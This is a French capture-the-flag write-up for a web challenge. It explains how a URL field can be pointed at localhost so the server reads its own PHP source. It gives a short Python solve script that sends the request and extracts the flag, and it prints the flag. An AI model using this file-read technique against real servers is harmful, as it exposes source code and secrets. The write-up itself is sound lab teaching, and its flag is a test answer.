gema

[CTF GEMA] Website

CTF GEMA Groupe 2025

Niveau de Difficulté : Medium

Catégorie du Challenge : Web

Description :
go !

Solutions Steps

  • Il s'agit d'un pseudo-exemple de Local File Inclusion. En spécifiant un serveur distant de 127.0.0.1 (localhost), le serveur répond en lisant les fichiers localement. Nous pouvons l'utiliser pour lire le fichier PHP qui sert index.php. Il en résulte l'affichage du drapeau du code source.

Solve Code :

import re, requests
r = requests.post("http://127.0.0.1:7300", data={'url': 'http://127.0.0.1/var/www/html/index.php'})
print(re.search(r'FLAG{(.*)}', r.text).group(0))

Flag :

FLAG{0p3n_B00k}

Published by:

OxyHack Staff

You might also like...

13
Mar

[CTF GEMA] Cookie

1 min read
13
Mar

[CTF GEMA] 11

1 min read
13
Mar

[CTF GEMA] Android OS

1 min read
13
Mar

[CTF GEMA] TSTM3

6 min read
13
Mar

[CTF GEMA] Try Harder

3 min read